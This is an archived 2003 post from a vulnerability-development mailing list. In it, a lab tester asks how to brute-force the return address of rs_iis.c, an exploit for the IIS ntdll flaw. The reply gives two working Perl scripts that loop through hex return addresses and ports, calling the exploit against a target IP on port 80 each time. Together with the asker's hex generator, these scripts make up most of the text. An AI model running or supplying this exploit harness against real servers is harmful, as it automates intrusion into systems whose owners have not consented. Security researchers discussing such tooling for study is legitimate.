Vulnerability Development mailing list archives
Re: Generating Hex Numbers to brute force rs_iis.c
From: "Maarten" <secfocus () hartsuijker com>
Date: Wed, 2 Apr 2003 18:06:00 +0200
Well, I suppose you are meaning something like:
#!/usr/bin/perl
$IP = @ARGV[0];
while ($x < 256)
{
$x++;
$y = sprintf("%02x",$x);
print "Trying at: $IP 0x${y}04 port 20${x}\n";
$output = `./rs_iis $IP 80 20${x} 0x${y}04`;
print "$output\n";
}
You can run it with "brute.pl IP"
You could run it with all possible 65536 possibilities, but that's probably
overkill.
#!/usr/bin/perl
$IP = @ARGV[0];
while ($x < 65536)
{
$x++;
$y = sprintf("%04x",$x);
$output = `./rs_iis $IP 80 12345 0x${y}`;
print "$output\n";
}
maarten
----- Original Message -----
From: "Jeremy Junginger" <jj () act com>
To: <vuln-dev () securityfocus com>
Sent: Monday, March 31, 2003 5:14 PM
Subject: Generating Hex Numbers to brute force rs_iis.c
Hey guys,
In playing with rs_iis.c (ntdll exploit) in our lab, I've been looking
for ways to brute force the return address.
I know there's been a shell script (rs_brute.sh) released that already
does this, but since I've been playing with PERL lately (and since this
shell script did not exist when I began playing with the exploit), I
thought I'd take a whack at producing the RET addresses (0x0000-0xffff)
in a PERL script. I just wanted to get your input and see if there is
and easier way to do this (using PERL, of course). Basically, the goal
is as follows:
1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern
(0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
2) pass the output to rs_iis via system() command?
So far, I can generate the output and print it to stdout. Any tips on
getting the script to run rs_iis once with each address produced by the
script? Also, is there a way to produce this output without creating an
array like this?
#!/usr/bin/perl -w
@HexD =
('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
for ($i = 0; $i <= 255; $i += 1) {
printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i);
printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i);
}
Many thanks,
-Jeremy
Current thread:
- Generating Hex Numbers to brute force rs_iis.c Jeremy Junginger (Apr 01)
- Re: Generating Hex Numbers to brute force rs_iis.c Joe Stewart (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Maarten (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Blue Boar (Apr 03)
- <Possible follow-ups>
- RE: Generating Hex Numbers to brute force rs_iis.c Joshua Wright (Apr 03)